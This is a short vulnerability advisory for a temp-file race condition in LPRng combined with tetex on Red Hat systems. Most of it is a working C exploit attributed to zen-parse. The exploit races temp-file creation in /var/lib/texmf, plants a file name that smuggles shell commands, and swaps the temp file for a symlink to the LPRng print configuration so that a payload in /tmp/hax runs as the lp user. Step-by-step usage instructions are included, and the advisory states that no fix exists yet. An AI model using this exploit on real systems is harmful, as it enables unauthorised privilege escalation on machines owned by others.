Vulnerability LPRng Affected LPRng-3.7.4-23 (and earlier) + tetex-1.0.7-7 (and earlier?) Description zen-parse@gmx.net found following. If the tetex package and LPRng are installed, there is an exploitable race condition with a tmp file that allows elevation of privs. It's fixed in rawhide, but that doesn't really help people who just use the provided up2date program to keep themselves secure. /******************************************************************** Redhat Bugzilla reference:- https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342 --zen-parse important info about this exploit: requires some fonts get made when its run. probably won't be a problem unless someone else has tried this exploit. just wait 90 days for /var/lib/texmf to clear and try again ;] or try print something different .dvi files are what does the trick. ********************************************************************/ int shake() { int f; char r[1000]; int w; f=fopen("/proc/loadavg","r"); fscanf(f,"%*s %*s %*s %*s %s",r); fclose(f); w=atoi(r); return w; } void cow(char *s,char *t,int ofs) { sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs); sprintf(t,"%s/lsR%d.tmp",s,ofs); } main() { char s[1000]; char t[1000]; int y,i; printf("Put the stuff to run as lp:lp in /tmp/hax\n"); printf("the lpr /usr/share/aspe<tab>/manual.dvi\n"); printf("when the ! comes up, wait a second, then press control-C.\n\n"); printf("Then print something.\n\n\n"); close(open("/var/lib/texmf/cd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd tmp\nexport PATH=.\nhax\nexit 0",65,0666)); while(1) { i=shake(); for(y=-30;y<0;y++) { cow(s,t,y+i); if(!access(t,0)) { printf("!\n"); unlink(t); symlink("/var/spool/lpd/lp/postscript.cfg",t); sleep(1); } } } } Solution Nothing yet.